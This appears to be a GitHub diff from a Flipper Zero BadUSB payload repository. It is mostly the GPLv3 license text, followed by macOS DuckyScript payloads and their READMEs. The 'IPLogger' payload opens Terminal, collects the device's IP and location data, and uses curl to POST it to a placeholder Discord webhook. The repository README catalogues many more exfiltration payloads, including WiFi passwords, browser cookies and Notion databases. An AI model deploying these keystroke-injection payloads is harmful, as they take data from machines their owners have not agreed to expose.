2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.
MacOS/Execution/IPLogger-Discord_Webhook-by_bst04/IPLogger-Discord_Webhook-by_bst04.txt
+19
View File
@@ -0,0 +1,19 @@
REM ==============================================================
REM Script created by bst04
REM Works on macOS systems
REM This script opens Terminal, fetches the public IP address
REM of the device, and sends it to a Discord webhook.
REM It uses curl to send the IP without JSON.
REM ===============================================================
DELAY 500
GUI SPACE
DELAY 500
STRING Terminal
ENTER
DELAY 1000
STRING location=$(curl -s https://ipapi.co/json/)
ENTER
DELAY 1000
STRING curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=$location" https://yourwebhook
ENTER
MacOS/Execution/IPLogger-Discord_Webhook-by_bst04/README.md
+36
View File
@@ -0,0 +1,36 @@
# IPLogger-FlipZero by bst04
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
This script, created by bst04, is designed to work on macOS systems. It opens Terminal, fetches the public IP address of the device, and sends it to a Discord webhook using `curl`.
---
## Technical Explanation
1. **Initialization**:
- `DELAY 500`: Waits for 0.5 seconds to ensure the system is ready.
- `GUI SPACE`: Simulates pressing the "Command" + "Space" keys to open Spotlight Search.
- `DELAY 500`: Waits for 0.5 seconds for Spotlight to open.
- `STRING Terminal`: Types "Terminal" to search for the Terminal application.
- `ENTER`: Opens the Terminal application.
2. **Fetch Public IP Address**:
- `DELAY 1000`: Waits for 1 second to ensure Terminal is fully opened.
- `STRING location=$(curl -s https://ipapi.co/json/)`: Fetches the public IP address and stores it in a variable named `location`.
3. **Send IP Address to Discord Webhook**:
- `DELAY 1000`: Waits for 1 second to ensure the previous command is executed.
- `STRING curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=$location" https://yourwebhook`: Sends the link to the specified Discord webhook.
---
## Usage
1. Copy the payload script to your DuckyScript-enabled device.
2. Ensure the device is connected to a macOS system.
3. Execute the payload to fetch and send the public IP address to your Discord webhook.
MacOS/Execution/SetVolumeMax-MacOS/README.md
+37
View File
@@ -0,0 +1,37 @@
# 🔊 SetVolumeMax-FlipZero by bst04
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
This payload, created by bst04, is designed to set the volume to maximum (100%) on a macOS device using AppleScript through Terminal.
---
## 📖 Technical Explanation
1. **Initialization**:
- `DELAY 1000`: Waits for 1 second to ensure the system is ready.
- `GUI SPACE`: Simulates pressing "Command" + "Space" to open Spotlight Search.
- `DELAY 250`: Waits for 0.25 seconds to ensure Spotlight is open.
2. **Set Volume to 100%**:
- `STRING VOL=$(osascript -e 'Set Volume 100')`: Types the AppleScript command to set the system volume to 100%.
- `DELAY 250`: Waits for 0.25 seconds.
- `ENTER`: Executes the command to set the volume.
3. **Close Terminal**:
- `DELAY 250`: Waits for 0.25 seconds.
- `GUI q`: Simulates pressing "Command" + "q" to quit the Terminal application.
---
## 📜 Usage
1. Copy the payload script to your DuckyScript-enabled device.
2. Ensure the device is connected to a macOS system.
3. Execute the payload to set the system volume to maximum (100%).
---
MacOS/Execution/SetVolumeMax-MacOS/payload.txt
+12
View File
@@ -0,0 +1,12 @@
REM ===========================
REM payload by bst04
REM ===========================
DELAY 1000
GUI SPACE
DELAY 250
STRING VOL=$(osascript -e 'Set Volume 100')
DELAY 250
ENTER
DELAY 250
GUI q
MacOS/README.md
+57
View File
@@ -0,0 +1,57 @@
# My Flipper Shits - MacOS
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) [![GitHub Sponsor](https://img.shields.io/github/sponsors/aleff-github?label=Sponsor&logo=GitHub&style=for-the-badge)](https://github.com/sponsors/aleff-github) [![Licence](https://img.shields.io/badge/Licence-GPLv3-%239e264c?style=for-the-badge)](https://github.com/aleff-github/my-flipper-shits/blob/main/LICENCE)
* [Disclaimer](#disclaimer)
* [PlugAndPlay (PAP) Legend](#plugandplay-pap-legend)
* [Payloads](#payloads)
* [Videos](#videos)
* [FAQs](#faqs)
* [Credits](#credits)
* [Donations](#donations)
## Disclaimer
<div align=center>
<img src="https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/img/DISCLAIMER.png" width="600" />
</div>
## PlugAndPlay (PAP) Legend
- 🟢 Totally - You must do nothing
- 🟡 Partial - Just something like a Dropbox Token or Discord Webhook...
- 🔴 Manual effort request
## Payloads
|System|Category|Name|PAP|
|--|--|--|--|
|![MacOS](https://img.shields.io/badge/macos-000000?style=for-the-badge&logo=macos&logoColor=white)|Execution|[IPLogger - Discord Webhook - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/MacOS/Execution/IPLogger-Discord_Webhook-by_bst04)|🟡|
|![MacOS](https://img.shields.io/badge/macos-000000?style=for-the-badge&logo=macos&logoColor=white)|Execution|[Set Volume Max - MacOS - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/MacOS/Execution/SetVolumeMax-MacOS)|🟢|
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://raw.githubusercontent.com/aleff-github/aleff-github/main/img/github.png width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://raw.githubusercontent.com/aleff-github/aleff-github/main/img/linkedin.png width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
README.md
+251
View File
@@ -0,0 +1,251 @@
# My Flipper Shits
<link rel="icon" href="https://github.com/aleff-github/my-flipper-shits/raw/main/img/gif/flipper_zero%20(15).gif" type="image/gif" >
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) [![Licence](https://img.shields.io/badge/Licence-GPLv3-%239e264c?style=for-the-badge)](https://github.com/aleff-github/my-flipper-shits/blob/main/LICENCE)
* [Disclaimer](#disclaimer)
* [PlugAndPlay (PAP) Legend](#plugandplay-pap-legend)
* [Stats](#stats)
* [Top Payload Contributors](#top-payload-contributors)
* [Payloads](#payloads)
* [FAQs](#faqs)
* [Some Boring Considerations](#some-boring-considerations)
* [Credits](#credits)
## Disclaimer
<div align=center>
<img src="https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/img/DISCLAIMER.png" width="600" />
</div>
## PlugAndPlay (PAP) Legend
- 🟢 Totally - You must do nothing
- 🟡 Partial - Just something like a Dropbox Token or Discord Webhook...
- 🔴 Manual effort request
## Stats
|Type|Count|
|--|--|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|30|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|52|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|5|
|![macOS](https://img.shields.io/badge/mac%20os-000000?style=for-the-badge&logo=macos&logoColor=F0F0F0)|2|
|**Tot**|89|
|**Community** contributions|7|
|**Hak5** Payload accepted|116|
|**Hak5** Payload Awarded|2|
## Top Payload Contributors
Contribute to the repository by publishing your payloads to climb the rankings
|Rank|Contributor|Payloads Published|
|----|-----------|------------------|
|🥇 1st|**[bst04](https://github.com/brunoooost)**|5|
|🥈 2nd|**[NexusWannaBe](https://github.com/NexusWannaBe)**|2|
|🥉 3rd| **[*maybe you...*](https://github.com/settings/profile)**|0|
## Payloads
|System|Category|Name|PAP|
|--|--|--|--|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Credentials|[WiFi Windows Passwords](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Credentials/WiFiPasswords_Windows)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Credentials|[Defend Yourself From CVE-2023-23397](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Credentials/Defend_yourself_from_CVE-2023-23397)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Exfiltrate Windows Product Key](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Exfiltrate_Windows_Product_Key)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Exfiltrate Process Info - Windows](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/ExfiltrateProcessInfo_Windows)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[ProtonVPN config](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/ProtonVPNConfigFile_Windows)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Windows netstat](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Netstat_Windows)|🔴|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Exfiltrate Computer Screenshots](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/ExfiltrateComputerScreenshots)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Export Cookies From Firefox](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Export_Cookies_From_Firefox)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Exports all the links of the downloads](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Exports_all_the_links_of_the_downloads)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Tree structure of the operating system](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Tree_structure_of_the_operating_system)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Export all saved certificates with Adobe Reader](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Export_all_saved_certificates_with_Adobe_Reader)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Exfiltrates the entire database of the Notion client](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Create And Exfiltrate A Webhook Of Discord](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Process Info - Linux](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateProcessInfo_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Network Traffic](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateNetworkTraffic_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Linux Documents](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateDocumentsFolder_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Linux Logs](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateLogFiles_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Network Configuration](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateNetworkConfiguration_Linux)|🟡|
